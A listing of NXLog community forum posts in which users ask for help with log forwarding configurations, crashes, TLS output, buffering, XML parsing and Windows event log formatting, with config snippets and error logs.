Ask questions. Get answers. Find technical product solutions from passionate experts in the NXLog community.

nxlog-ce-3.0.2284 crashing randomly after upgrading from 2.10.2150
Hello, I am having stability issues with the newest nxlog-ce release 3.0.2284. I have been using nxlog-ce-2.10.2150 for several years and it has been very stable in our environment with few issues. I use papertrail for log collection, and I have a highly customized configuration file. I did a test roll-out of 3.0.2284 to a few servers and did not notice any issues at first. However after rolling out the update to approximately 40 servers it started crashing randomly in ntdll.dll causing the nxlog service to stop and re-start itself. There was no rhyme or reason to it. It would work fine for 15 minutes and then suddenly I would start getting multiple random crashes and service restarts which would then crush papertrail with the previous 30 days of event log history (per crashed server) and my papertrail storage utilization doubled my average daily usage in a few hours. I had to roll-back all the servers back to 2.10.2150 to stop the bleeding. The servers used in the test were a variety of Windows 2012r2, 2016, 2019, and 2022 servers. By far the majority of the servers are running server 2016. Some are hyper-v hosts running on bare metal, others are virtual machines that run on those hyper-v hosts. My papertrail logs are full of these errors, but here is a small sampling. These are server 2019 and 2022 respectively. Oct 10 21:31:21 hv-host19-f4 Application-Error { "Message": "Faulting application name:nxlog.exe, version:0.0.0.0, time stamp:0x00000000|Faulting module name:libssl-1_1-x64.dll, version:1.1.1.13, time stamp:0x00000000|Exception code:0xc0000005|Fault offset:0x0000000000021b97|Faulting process id:0xf5d0|Faulting application start time:0x01d8dd0fc8bd493e|Faulting application path:c:\\apps\\nxlog\\nxlog.exe|Faulting module path:c:\\apps\\nxlog\\libssl-1_1-x64.dll|Report Id:08b0fd02-0e57-44b0-81fc-b1e7fb47f472|Faulting package full name:|Faulting package-relative application ID:", "Hostname": "hv-host19-f4", "EventType": "ERROR", "SeverityValue": 4, "Severity": "ERROR", "EventID": 1000, "SourceName": "Application-Error", "Task": 100, "RecordNumber": 12236, "ProcessID": 0, "ThreadID": 0, "Channel": "Application", "EventTime": "2022-10-10 21:23:29", "Category": "Application Crashing Events", "Opcode": "Info" } Oct 10 21:52:21 ws-ops22-2 nxlog-ce nxlog-ce-3.0.2284 startup profile 2022.01.25 (DEFAULT) Oct 10 21:52:22 ws-ops22-2 nxlog-ce connecting to logs99.papertrailapp.com:12345 Oct 10 21:52:22 ws-ops22-2 nxlog-ce successfully connected to logs99.papertrailapp.com:12345 Oct 10 21:52:23 ws-ops22-2 Application-Error { "Message": "Faulting application name:nxlog.exe, version:0.0.0.0, time stamp:0x00000000|Faulting module name:ntdll.dll, version:10.0.20348.803, time stamp:0xbee6f04c|Exception code:0xc0000374|Fault offset:0x00000000001044a9|Faulting process id:0x26f4|Faulting application start time:0x01d8ca290a171970|Faulting application path:c:\\apps\\nxlog\\nxlog.exe|Faulting module path:C:\\WINDOWS\\SYSTEM32\\ntdll.dll|Report Id:5e5549b8-3c8b-405a-a78f-fd4c1f296a40|Faulting package full name:|Faulting package-relative application ID:", "Hostname": "ws-ops22-2", "EventType": "ERROR", "SeverityValue": 4, "Severity": "ERROR", "EventID": 1000, "SourceName": "Application-Error", "Version": 0, "Task": 100, "OpcodeValue": 0, "RecordNumber": 1100, "ProcessID": 0, "ThreadID": 0, "Channel": "Application", "EventTime": "2022-09-16 21:30:36", "Category": "Application Crashing Events", "Opcode": "Info" } Oct 10 21:54:35 ws-ops22-2 Application-Error { "Message": "Faulting application name:nxlog.exe, version:0.0.0.0, time stamp:0x00000000|Faulting module name:libcrypto-1_1-x64.dll, version:1.1.1.13, time stamp:0x00000000|Exception code:0xc0000005|Fault offset:0x00000000001ba014|Faulting process id:0x30e8|Faulting application start time:0x01d8caef9eba1346|Faulting application path:c:\\apps\\nxlog\\nxlog.exe|Faulting module path:c:\\apps\\nxlog\\libcrypto-1_1-x64.dll|Report Id:12281218-b154-47ae-a426-1495de2adf0d|Faulting package full name:|Faulting package-relative application ID:", "Hostname": "ws-ops22-2", "EventType": "ERROR", "SeverityValue": 4, "Severity": "ERROR", "EventID": 1000, "SourceName": "Application-Error", "Version": 0, "Task": 100, "OpcodeValue": 0, "RecordNumber": 1304, "ProcessID": 0, "ThreadID": 0, "Channel": "Application", "EventTime": "2022-09-17 20:00:44", "Category": "Application Crashing Events", "Opcode": "Info" } The crashing seems to indicate an issue with TLS or crypto but my existing papertrail configuration has been working fine for literally years. Another issue I ran into, while removing nxlog-ce-3.0.2284 is that issuing a stop-service to command to the service returns "The pipe has been ended" error instead of a normal service shutdown gracefully message. This happened every time I tried to stop the service. The service did stop, but given the error I don't know if it was a graceful stop or if it was a hard stop that ends up causing the eventlog to be re-uploaded in its entirety when the service started again. I had a lot of that going on so I can't say for sure if it happened or not. [SC] ControlService FAILED 109: The pipe has been ended. Finally here is a snippet of the bottom of my nxlog.conf file where I set up the connection to papertrail. I've changed the host parameters slightly for security. <Route nxlog> Path from_nxlog => to_papertrail </Route> <Route eventlogs> Path from_eventlog => noisefilter => cleanup => reorder => jsonify => to_papertrail </Route> <Route c_logs> Path from_c_logs => to_papertrail </Route> <Output to_papertrail> Module om_ssl Host logs99.papertrailapp.com Port 12345 CAFile %ROOT%/cert/papertrail-bundle.pem AllowUntrusted FALSE # Convert to syslog format Exec to_syslog_bsd(); </Output> I'm considering pushing the logs to a local linux server with om_udp and let that server relay the logs to papertrail over TLS to workaround the issue but that adds extra complexity to the environment that I would rather not have to support. Thanks Ron

rdefulio
Replies: 7
View post »
NenadM
Split json record in multiple records?
Hi, I'm experimenting with reading from an Azure eventhub with im_kafka. The eventhub receives security data from various security related azure components. The im_kafka module works great after i found out that the username should be $connectionstring ;). The output of the eventhub is a json dict with an array, like this: { records: [ {id: 1, msg: "xyz", etc},{id: 2, msg: "abc", etc}]}. I tried to use extract_json("$.records") but that does not iterate over the array. I also made a python script that writes the logs to a file, one line at a time: from confluent_kafka import Consumer import json c = Consumer({....}) while True: msg = c.poll(1.0) eventhub_records = json.loads(msg.value()) for record in eventhub_records['records']: print(json.dumps(record)) This works great, but i'd like to have something like this in nxlog. Can this be done, or does nxlog not support to split a single record into multiple records? Thanks!

joost.bijl
Replies: 1
View post »
jeffron
Add IP Address (Community Edition)
Hi! Newbie on NXlog here. I'm trying to add the IP Address to the logs that I'm sending but I couldn't found any funcionality to do this (at least on the Community Edition). Is there any way to do that with the CE? Something like $ip = whats_my_ip?() ? Thanks a lot!

JDiaz
Replies: 1
View post »
JDiaz
ONEOF block
hi I have an application that writes many log files to folder on my windows server. Each log only contain one or two lines. Previously the files were deleted by another system but that is now decommissioned. I wanted to use NXLOG to delete the files once it has treated its contents(nothing else will be added after) looking in the community edition docs I can use an ONEOF block with a remove. The config is parsed correctly and the logs are sent to my graylog server, however the logs are never removed. I saw some posts that suggested this block only works with the paid version but its strange that it is documented in the community docs? Can any one tell me where i am going wrong ou another way of doing this This is an extract from my config version nxlog-ce-3.0.2284 <Extension _fileop> Module xm_fileop </Extension> <Extension csv1> Module xm_csv Fields $Method,$Host,$Application,$EventID,$Severity,$Date,$Time,$Description,$Value Delimiter | </Extension> <Input hyp-in> Module im_file SavePos TRUE ReadFromLast FALSE ActiveFiles 20 CloseWhenIdle TRUE File "C:\HYPERVISION\logFiles*.*" <Exec> csv1->parse_csv(); $InputFileName1 = file_name(); $Message = $raw_event; </Exec> <OnEOF> Exec file_remove(file_name(), now() - 6000); </OnEOF> </Input>

Petex
Replies: 1
View post »
NenadM
pm_buffer not filling on network error
Hi, I have the requirement to buffer logs that were unable to be sent during network failures. I have the following config which makes NXLog CE create a buffer file but it stays at 0KB size with a missing network. My logs show the expected network failure: 2022-10-04 10:01:52 INFO nxlog-ce-3.0.2284 started 2022-10-04 10:01:52 INFO reconnecting in 1 seconds 2022-10-04 10:01:52 ERROR apr_sockaddr_info failed for myserver.com:1514; No such host is known. 2022-10-04 10:01:53 INFO reconnecting in 2 seconds 2022-10-04 10:01:53 ERROR apr_sockaddr_info failed for myserver.com:1514; No such host is known. 2022-10-04 10:01:55 INFO reconnecting in 4 seconds nxlog.conf <Extension syslog> Module xm_syslog </Extension> <Extension json> Module xm_json </Extension> <Input inWindowsAudit> Module im_msvistalog ReadFromLast True <QueryXML> <QueryList> <Query Id="0"> <Select Path="Microsoft-Windows-Sysmon/Operational">*</Select> </Query> </QueryList> </QueryXML> Exec parse_syslog(); to_json(); </Input> <Processor buffer> Module pm_buffer Type Disk # 40 MiB buffer MaxSize 40960 # Generate warning message at 20 MiB WarnLimit 20480 </Processor> <Output ssl> Module om_ssl Host myserver.com Port 1514 CAFile %CERTDIR%\ca-root.cer CertFile %CERTDIR%\client.cer CertKeyFile %CERTDIR%\client_private.key KeyPass secret AllowUntrusted FALSE </Output> <Route main> Path inWindowsAudit => buffer => ssl </Route> Any ideas? Thanks.

dmuensterer
Replies: 2
View post »
dmuensterer
Splunk HF and NXlog via SSL
Did anyone manage to send logs from Splunk HF to NXlog server with SSL mutual authentication enabled? Able to share your configuration? Received an error on SSL version. Not sure it is due to Splunk HF conf or NXlog. Thanks.

nktj
Replies: 1
View post »
gahorvath
NXLog fail to start on macOS
Hello I'm using NXLog 5.6.7727 version for Apple Silicon When I start the service as root manually with the CLI /opt/nxlog/bin/nxlog -f the service works and my logs are sent. The same settings started with launchd works but don't send anything. Any ideas why? Here is my current configuration: User nxlog Group nxlog Panic Soft # default values: define INSTALLDIR /opt/nxlog PidFile %INSTALLDIR%/var/run/nxlog/nxlog.pid CacheDir %INSTALLDIR%/var/spool/nxlog ModuleDir %INSTALLDIR%/libexec/nxlog/modules SpoolDir %INSTALLDIR%/var/spool/nxlog define CERTDIR %INSTALLDIR%/var/lib/nxlog/cert define CONFDIR %INSTALLDIR%/etc/nxlog.d # Note that these two lines define constants only; the log file location # is ultimately set by the `LogFile` directive (see below). The # `MYLOGFILE` define is also used to rotate the log file automatically # (see the `_fileop` block). define LOGDIR %INSTALLDIR%/var/log/nxlog define MYLOGFILE %LOGDIR%/nxlog.log <Extension _json> Module xm_json </Extension> <Extension gelf> Module xm_gelf </Extension> <Input macos_es> Module im_maces NotifyEvents All <Exec> $Hostname = hostname(); to_json(); </Exec> </Input> <Input macos_uls> Module im_maculs UUIDTextPath "/var/db/uuidtext" <Exec> if $subsystem == 'com.apple.SkyLight' { drop(); } $Hostname = hostname(); to_json(); </Exec> </Input> <Output graylog> Module om_tcp Host 10.0.0.10:12201 OutputType GELF_TCP </Output> <Route Mac2Graylog> Path macos_uls, macos_es => graylog </Route>

ygini
Replies: 1
View post »
NenadM
Adding field as source IP gateway address
Hello, I need to add extra field to send External/gateway IP address to Graylog. Using output UDP: <Output out> Module om_udp Host *** Port 4514 OutputType GELF Exec $hostname = 'test_SRV'; </Output> Its even posible?

JustasS
Replies: 1
View post »
NenadM
xml log parsing on windows with community edition won't get extract_xml recognized.
I'm trying to ws_ftp logs that are xml formatted as such : <?xml version="1.0" encoding="utf-8" ?> <log> <entry> <log_time> xxxx </log_time> <description>data <![CDATA[Connection established]]></description> <service>data </service> <sessionid> xxxx </sessionid> <type>0</type> <severity>0</severity> <lstnconnaddr> ip </lstnconnaddr> <cliconnaddr>ip </cliconnaddr> <sguid> xxx </sguid> </entry> ... with this configuration : define ROOT C:\Program Files\nxlog <Extension gelf> Module xm_gelf </Extension> Moduledir %ROOT%\modules CacheDir %ROOT%\data Pidfile %ROOT%\data\nxlog.pid SpoolDir %ROOT%\data LogFile %ROOT%\data\nxlog.log <Extension multiline> Module xm_multiline HeaderLine /^<event>/ EndLine /^</event>/ </Extension> <Extension xmlparser> Module xm_xml </Extension> <Extension json> Module xm_json </Extension> <Input in> Module im_file File "PATH TO .XML" SavePos FALSE PollInterval 1 ReadFromLast FALSE InputType multiline <Exec> $EventData = extract_xml("/log/entry"); if $EventData == "" { delete($EventData); } to_json(); </Exec> </Input> <Output out> Module om_file File "C:\\temp\\output_test.txt" </Output> <Route 1> Path in => out </Route> i can't get past this error : ERROR Couldn't parse Exec block at C:\Program Files\nxlog\conf\nxlog.conf:34; couldn't parse statement at line 35, character 40 in C:\Program Files\nxlog\conf\nxlog.conf; function 'extract_xml()' does not exist or takes different arguments ERROR module 'in' has configuration errors, not adding to route '1' at C:\Program Files\nxlog\conf\nxlog.conf:51 how can i get further?

har3005
Replies: 2
View post »
NenadM
Link to download older version of trial installer
Hi Ive got a customer with windows server core (no gui) and they are wanting to uninstall the trial version and have asked if we can give them a copy of the original msi. They are after version 5.4.7313 I've had a look at the download section and it isn't there. Any suggestions please? Thanks Bryan

bryan.tabb.secops
Is it possible to use a variable in a regex?
Is it possible to use a variable in a regex? I'm trying to do something like the following: Exec if ($EventID == 4104) { if defined(get_var('scriptblockid')) { $id = get_var('scriptblockid'); if ($Message =~ /ScriptBlock ID: $id/) drop(); } if ($Message =~ /ClassName = 'Root\/Microsoft\/Windows/) { if ($Message =~/ScriptBlock ID: (\S+)/) { set_var('scriptblockid', $1); } drop(); } }

opoplawski
Replies: 1
View post »
opoplawski
Agent not showing as online in manager
Hello, We've deployed NXLog EE agents on numerous Windows servers, and we're facing a strange issue with just one agent. It does not, and we're unable to get it to, show as online within the NXLog Manager. The agent's log states that it was able to successfully connect to the manager, but it's still showing as offline in the UI. I have tried the following: Upgraded agent to the latest version Verified that the agent's logs said it was able to connect to the manager (10.40.1.90) Removed the agent from the manager interface Removed the agent off of the server Reinstalled the agent on the server, and reconfigured the certificate and managed.conf file Verified that it connected to the manager in the agent's logs And even after all of that, the agent is still showing as offline on the manager's UI. 2022-09-23 16:22:40 WARNING [CORE|main] no functional input modules! 2022-09-23 16:22:40 INFO [CORE|main] nxlog-5.6.7727 (50b2a4353@REL_v5.6) started on Windows 2022-09-23 16:22:40 INFO [xm_admin|agent_management] connecting to 192.168.1.1:4041 2022-09-23 16:23:01 ERROR [xm_admin|agent_management] couldn't connect to 192.168.1.1:4041; A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. 2022-09-23 16:23:01 INFO [xm_admin|agent_management] reconnecting to 192.168.1.1:4041 in 1 sec 2022-09-23 16:23:02 INFO [xm_admin|agent_management] connecting to 192.168.1.1:4041 2022-09-23 16:23:21 WARNING [CORE|main] stopping nxlog service 2022-09-23 16:23:21 WARNING [CORE|main] nxlog received a termination request signal, exiting... 2022-09-23 16:23:23 ERROR [xm_admin|agent_management] couldn't connect to 192.168.1.1:4041; A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. 2022-09-23 16:23:23 INFO [xm_admin|agent_management] reconnecting to 192.168.1.1:4041 in 2 sec 2022-09-23 16:23:24 WARNING [CORE|main] no functional input modules! 2022-09-23 16:23:24 INFO [CORE|main] nxlog-5.6.7727 (50b2a4353@REL_v5.6) started on Windows 2022-09-23 16:23:24 INFO [xm_admin|agent_management] connecting to 10.40.1.90:4041 <==== Here I set the manager's correct IP in managed.conf 2022-09-23 16:23:24 INFO [xm_admin|agent_management] tcp connection established with 10.40.1.90:4041 2022-09-23 16:28:24 WARNING [xm_admin|agent_management] did not receive requests from agent manager in the past 300 seconds, disconnecting 2022-09-23 16:28:24 INFO [xm_admin|agent_management] reconnecting to 10.40.1.90:4041 (last connection attempt was 300 sec ago) 2022-09-23 16:28:24 INFO [xm_admin|agent_management] connecting to 10.40.1.90:4041 2022-09-23 16:28:24 INFO [xm_admin|agent_management] tcp connection established with 10.40.1.90:4041 <==== Here it says it was able to connect to the manager just fine. Does anyone have an idea as to what's going on here? Any help would be greatly appreciated! Thanks!

nervevector
im_vistalog parser failure. Introducing \n characters in syslog output that split a single record in two records...
Hello, I am experiencing truncated syslog messages, and found the root cause. Event are not correctly parsed such as this example: Here is the original message read from eventviewer: <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"> <System> <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}" /> <EventID>4663</EventID> <Version>1</Version> <Level>0</Level> <Task>12812</Task> <Opcode>0</Opcode> <Keywords>0x8020000000000000</Keywords> <TimeCreated SystemTime="2022-09-22T13:19:53.982486800Z" /> <EventRecordID>5610</EventRecordID> <Correlation /> <Execution ProcessID="4" ThreadID="2724" /> <Channel>Security</Channel> <Computer>PC-1304.domain.priv</Computer> <Security /> </System> <EventData> <Data Name="SubjectUserSid">S-1-5-21-894803723-839211917-112803419-1225</Data> <Data Name="SubjectUserName">username</Data> <Data Name="SubjectDomainName">Domain</Data> <Data Name="SubjectLogonId">0x71979</Data> <Data Name="ObjectServer">Security</Data> <Data Name="ObjectType">File</Data> <Data Name="ObjectName">\Device\HarddiskVolume5&lt;/Data> <Data Name="HandleId">0x1054</Data> <Data Name="AccessList">%%4416</Data> <Data Name="AccessMask">0x1</Data> <Data Name="ProcessId">0x484</Data> <Data Name="ProcessName">C:\Windows\System32\mstsc.exe</Data> <Data Name="ResourceAttributes" /> </EventData> <RenderingInfo Culture="fr-FR"> <Message>Une tentative d’accès à un objet a été effectuée. Sujet : ID de sécurité : S-1-5-21-894803723-839211917-112803419-1225 Nom du compte : username Domaine du compte : Domain ID d’ouverture de session : 0x71979 Objet : Serveur de l’objet : Security Type d’objet : File Nom de l’objet : \Device\HarddiskVolume5\ ID du handle : 0x1054 Attributs de ressource : Informations sur le processus : ID du processus : 0x484 Nom du processus : C:\Windows\System32\mstsc.exe Informations sur la demande d’accès : Accès : Lecture données (ou liste de répertoire) Masque d’accès : 0x1</Message> <Level>Information</Level> <Task>Removable Storage</Task> <Opcode>Informations</Opcode> <Channel>Sécurité</Channel> <Provider>Microsoft Windows security auditing.</Provider> <Keywords> <Keyword>Succès de l’audit</Keyword> </Keywords> </RenderingInfo> </Event> Here's the corresponding syslog line produced by om_syslog. Please note that this line is spannig more than one line, this is the problem, read more please. (Forum post format may alter the rendering...) <14>1 2022-09-22T15:19:53.982486+02:00 PC-1304.domain.priv Microsoft-Windows-Security-Auditing 4 - [NXLOG@14506 Keywords="-9214364837600034816" EventType="AUDIT_SUCCESS" EventID="4663" ProviderGuid="{54849625-5478-4994-A5BA-3E3B0328C30D}" Version="1" Task="12812" OpcodeValue="0" RecordNumber="5610" ThreadID="2724" Channel="Security" Category="Removable Storage" Opcode="Informations" SubjectUserSid="S-1-5-21-894803723-839211917-112803419-1225" SubjectUserName="username" SubjectDomainName="domain" SubjectLogonId="0x71979" ObjectServer="Security" ObjectType="File" ObjectName="\Device\HarddiskVolume5\" HandleId="0x1054" AccessList="%%4416 " AccessMask="0x1" ProcessName="C:\Windows\System32\mstsc.exe" EventReceivedTime="2022-09-22 15:20:26" SourceModuleName="eventlog" SourceModuleType="im_msvistalog"] <Event><EventTime>2022-09-22 15:19:53</EventTime><Hostname>PC-1304.domain.priv</Hostname><Keywords>-9214364837600034816</Keywords><EventType>AUDIT_SUCCESS</EventType><SeverityValue>2</SeverityValue><Severity>INFO</Severity><EventID>4663</EventID><SourceName>Microsoft-Windows-Security-Auditing</SourceName><ProviderGuid>{54849625-5478-4994-A5BA-3E3B0328C30D}</ProviderGuid><Version>1</Version><Task>12812</Task><OpcodeValue>0</OpcodeValue><RecordNumber>5610</RecordNumber><ProcessID>4</ProcessID><ThreadID>2724</ThreadID><Channel>Security</Channel><Message>Une tentative d’accès à un objet a été effectuée.&#xD;&#xA;&#xD;&#xA;Sujet :&#xD;&#xA; ID de sécurité : S-1-5-21-894803723-839211917-112803419-1225&#xD;&#xA; Nom du compte : username&#xD;&#xA; Domaine du compte : domain&#xD;&#xA; ID d’ouverture de session : 0x71979&#xD;&#xA;&#xD;&#xA;Objet :&#xD;&#xA; Serveur de l’objet : Security&#xD;&#xA; Type d’objet : File&#xD;&#xA; Nom de l’objet : \Device\HarddiskVolume5&amp;#xD;&#xA; ID du handle : 0x1054&#xD;&#xA; Attributs de ressource : &#xD;&#xA;&#xD;&#xA;Informations sur le processus :&#xD;&#xA; ID du processus : 0x484&#xD;&#xA; Nom du processus : C:\Windows\System32\mstsc.exe&#xD;&#xA;&#xD;&#xA;Informations sur la demande d’accès :&#xD;&#xA; Accès : Lecture données (ou liste de répertoire)&#xD;&#xA; &#xD;&#xA; Masque d’accès : 0x1</Message><Category>Removable Storage</Category><Opcode>Informations</Opcode><SubjectUserSid>S-1-5-21-894803723-839211917-112803419-1225</SubjectUserSid><SubjectUserName>username</SubjectUserName><SubjectDomainName>Domain</SubjectDomainName><SubjectLogonId>0x71979</SubjectLogonId><ObjectServer>Security</ObjectServer><ObjectType>File</ObjectType><ObjectName>\Device\HarddiskVolume5&lt;/ObjectName><HandleId>0x1054</HandleId><AccessList>%%4416&#xD;&#xA; </AccessList><AccessMask>0x1</AccessMask><ProcessName>C:\Windows\System32\mstsc.exe</ProcessName><EventReceivedTime>2022-09-22 15:20:26</EventReceivedTime><SourceModuleName>eventlog</SourceModuleName><SourceModuleType>im_msvistalog</SourceModuleType></Event> Problem is the AccessList value (read from the syslog message): HandleId="0x1054" AccessList="%%4416 " AccessMask="0x1" ProcessName="C:\Windows\System32\mstsc.exe" If we comparing XML and syslog output: XML output <Data Name="AccessList">%%4416</Data> syslog output AccessList="%%4416 " ^^^^^^^^^^^^^^^^ Mind those characters ! AccessList="%%4416 <---- a new line character is invisible but here (this is THE bug, splitting the syslog message) " <----- multiple tab characters are invisible but here (because of HTML) End of line \x0a is record separator in syslog format so the line is split in two syslog records (of course the second record is invalid) It seems that the content of AccessList Key Value is not extracted from XML but from the Message. Looking at the <Message> we see AccessList is incorrect: <AccessList>%%4416&#xD;&#xA; </AccessList> where AccessList in XML is: <Data Name="AccessList">%%4416</Data> Conclusion there is a bug in the event parser that do not escape "#xD;&#xA; " characters correctly, decoding the #xA; in \x0a cutting the syslog message... You can easily reproduce the problem using this configuration: <Input eventlog> Module im_msvistalog SavePos True &lt;QueryXML&gt; &lt;QueryList&gt; &lt;Query Id=&quot;10&quot;&gt; &lt;Select Path=&quot;ForwardedEvents&quot;&gt;*&lt;/Select&gt; &lt;/Query&gt; &lt;Query Id=&quot;20&quot;&gt; &lt;Select Path=&quot;Application&quot;&gt;*&lt;/Select&gt; &lt;Select Path=&quot;System&quot;&gt;*&lt;/Select&gt; &lt;/Query&gt; &lt;/QueryList&gt; &lt;/QueryXML&gt; Exec $Message = to_xml(); </Input> <Output debugsyslog> Module om_file File 'C:\Install\nxlog.debug.syslog.txt' Exec to_syslog_ietf(); </Output> <Route syslog_file> Path eventlog => debugsyslog </Route>

Ak0
Replies: 1
View post »
Ak0
TLS Syslog Cert Question - PEM vs CER
Hi All, We are cutting our NXLog Community version over to a new solution and are currently using .pem certificate files to encrypt syslog in the om_ssl module. The new system is using a .cer file for the certificate and when cutting over an agent to reference the .cer rather than .pem, it doesn't seem like the logs are being decrypted. I didn't see anything in the documentation indicating NXLog doesn't support .cer or only supports .pem, but I wanted to query the forum to see if anyone else experienced issues with setting the TLS to utilize a .epm files for encrypted log forwrding. Thanks.

mwidesba
Replies: 1
View post »
mwidesba
Add on end of line
Hi I have this config: <Input WarnLog> Module im_file File 'C:\warnlog.txt' </Input> <Input SpamLog> Module im_file File 'C:\spamlog.txt' </Input> <Output out> Module om_udp Host 192.168.1.2 Port 5555 </Output> <Route 1> Path WarnLog => out </Route> <Route 2> Path SpamLog => out </Route> Warnlog look like this: 16.09.2022 11:54:54 Update Updater: Switch modules type retval = 0x00005007 [NOT NEED] SYSTEM 16.09.2022 11:54:54 Update Updater: retval = 0x5003, failures: 0, profile: aktualizacja, trigger: ConfigChange SYSTEM 16.09.2022 11:54:54 Update Mirror: retval = 0x5003 SYSTEM Spamlog: 16.09.2022 12:07:24 some@address.com some@address.com RE: subject 16.09.2022 12:04:59 0 No rule classifies the email Retained H|RN=0;RNP= 16.09.2022 12:12:24 some@address.com some@address.com RE: subject 16.09.2022 12:09:51 0 No rule classifies the email Retained H|RN=0;RNP= Everything works fine, i see messages on my syslog server, but i don't know what type of message it is. From spamlog or form warnlog. How can I add something to the end of each line before sending to syslog. Or there is other way?

5ss0
Replies: 1
View post »
Klevin
Require Windows Event log in Raw XML Format
I am having trouble configuring NXlog Enterprise to forward Windows Event log in the original raw XML format that is shown in the XML View in Details Tab. The required data is: <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"> <System> <Provider Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" Name="Microsoft-Windows-Security-Auditing"/> <EventID>4624</EventID> <Version>2</Version> <Level>Information</Level> <Task>Logon</Task> <Opcode>Info</Opcode> <Keywords>Audit Success</Keywords> <TimeCreated SystemTime="2022-09-15T07:25:38.254241000Z"/> <EventRecordID>6733</EventRecordID> <Correlation ActivityID="{9C53E768-C82B-0003-78E7-539C2BC8D801}"/> <Execution ProcessID="772" ThreadID="19980"/> <Channel>Security</Channel> <Computer>Redacted01</Computer> <Security/> </System> <EventData> <Data Name="SubjectUserSid">NT AUTHORITY\SYSTEM</Data> <Data Name="SubjectUserName">Redacted01$</Data> <Data Name="SubjectDomainName">WORKGROUP</Data> <Data Name="SubjectLogonId">0x3e7</Data> <Data Name="TargetUserSid">Redacted01\Redacted03</Data> <Data Name="TargetUserName">Redacted03</Data> <Data Name="TargetDomainName">Redacted01</Data> <Data Name="TargetLogonId">0x45b8d14</Data> <Data Name="LogonType">7</Data> <Data Name="LogonProcessName">User32 </Data> <Data Name="AuthenticationPackageName">Negotiate</Data> <Data Name="WorkstationName">Redacted01</Data> <Data Name="LogonGuid">{00000000-0000-0000-0000-000000000000}</Data> <Data Name="TransmittedServices">-</Data> <Data Name="LmPackageName">-</Data> <Data Name="KeyLength">0</Data> <Data Name="ProcessId">0x438</Data> <Data Name="ProcessName">C:\Windows\System32\svchost.exe</Data> <Data Name="IpAddress">Redacted02</Data> <Data Name="IpPort">0</Data> <Data Name="ImpersonationLevel">Impersonation</Data> <Data Name="RestrictedAdminMode">-</Data> <Data Name="TargetOutboundUserName">-</Data> <Data Name="TargetOutboundDomainName">-</Data> <Data Name="VirtualAccount">No</Data> <Data Name="TargetLinkedLogonId">0x0</Data> <Data Name="ElevatedToken">Yes</Data> </EventData> </Event> The data I am currently receiving is the informatio in the General Tab instead. I have applied the following configuration to convert the data in XML format: define ROOT C:\Program Files\nxlog Moduledir %ROOT%\modules CacheDir %ROOT%\data Pidfile %ROOT%\data\nxlog.pid SpoolDir %ROOT%\data LogFile %ROOT%\data\nxlog.log <Extension _syslog> Module xm_syslog </Extension> <Extension _json> Module xm_json </Extension> <Extension xml> Module xm_xml </Extension> <Input in_win> Module im_msvistalog Query <QueryList> \ <Query Id="0"> \ <Select Path="Application">*</Select> \ <Select Path="System">*</Select> \ <Select Path="Security">*</Select> \ </Query> \ </QueryList> Exec $Message=$EventXML;$log_type=$event_trace;to_xml(); </Input> <Output out_win> Module om_udp Host 192.168.108.201:514 </Output> <Route 2> Path in_win => out_win </Route> However, I am not able to get the desired output. The data I am currently receiving is: 09 15 2022 03:53:34 192.168.115.4 <USER:NOTE> <EventTime>2022-09-15 16:38:31</EventTime><Hostname>SOCJH-04.cryptogennepal.com</Hostname><Keywords>9232379236109516800</Keywords><EventType>AUDIT_SUCCESS</EventType><SeverityValue>2</SeverityValue><Severity>INFO</Severity><EventID>4624</EventID><SourceName>Microsoft-Windows-Security-Auditing</SourceName><ProviderGuid>{54849625-5478-4994-A5BA-3E3B0328C30D}</ProviderGuid><Version>2</Version><TaskValue>12544</TaskValue><OpcodeValue>0</OpcodeValue><RecordNumber>189928</RecordNumber><ExecutionProcessID>748</ExecutionProcessID><ExecutionThreadID>11540</ExecutionThreadID><Channel>Security</Channel><Message/><Category>Logon</Category><Opcode>Info</Opcode><SubjectUserSid>S-1-5-18</SubjectUserSid><SubjectUserName>SOCJH-04$</SubjectUserName><SubjectDomainName>CGN</SubjectDomainName><SubjectLogonId>0x3e7</SubjectLogonId><TargetUserSid>S-1-5-21-1983202128-2021996171-226450221-1105</TargetUserSid><TargetUserName>srijan.kafle</TargetUserName><TargetDomainName>CGN</TargetDomainName><TargetLogonId>0x1e170ee</TargetLogonId><LogonType>7</LogonType><LogonProcessName>Negotiat</LogonProcessName><AuthenticationPackageName>Negotiate</AuthenticationPackageName><WorkstationName>SOCJH-04</WorkstationName><LogonGuid>{4eaf9196-9215-5425-4e8c-729f74b2f1ce}</LogonGuid><TransmittedServices>-</TransmittedServices><LmPackageName>-</LmPackageName><KeyLength>0</KeyLength><ProcessId>0x2ec</ProcessId><ProcessName>C:\Windows\System32\lsass.exe</ProcessName><IpAddress>-</IpAddress><IpPort>-</IpPort><ImpersonationLevel>%%1833</ImpersonationLevel><RestrictedAdminMode>-</RestrictedAdminMode><TargetOutboundUserName>-</TargetOutboundUserName><TargetOutboundDomainName>-</TargetOutboundDomainName><VirtualAccount>%%1843</VirtualAccount><TargetLinkedLogonId>0x0</TargetLinkedLogonId><ElevatedToken>%%1843</ElevatedToken><EventReceivedTime>2022-09-15 16:38:33</EventReceivedTime><SourceModuleName>in_win</SourceModuleName><SourceModuleType>im_msvistalog</SourceModuleType><log_type/></Event> Requesting assistance/documentation to achieve the desired log format

Srijan
Replies: 1
View post »
Klevin
Possible memory leak? - Windows Server 2012 R2 - NXLog EE
Hello all, Hoping someone will be able to pinpoint the issue we're experiencing. We have deployed the latest NXLog Enterprise Edition agents (nxlog-5.5.7535) on numerous Windows servers, including multiple domain controllers (DCs). We're running into an issue where the agents on two DCs have a continuous increase in RAM usage. No other servers experience this problem. Over multiple days the memory usage by the agent slowly increases to gigabytes. This will keep increasing, but we restart the agent and we're back at ~10MB of RAM usage. The DCs with this issue run Windows Server 2012 R2. There are newer DCs in place as well, running Windows Server 2022. These new DCs do not have this problem. Does anyone have an idea as to why this is happening? If you require further information, please let me know. All the DCs have the same agent template deployed on them, see below: <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <agent> <agentType>TEMPLATE</agentType> <global-config> <log-level>INFO</log-level> <is-log-to-file>true</is-log-to-file> <connection-mode>LISTEN_FROM</connection-mode> <connection-address>172.16.1.44</connection-address> 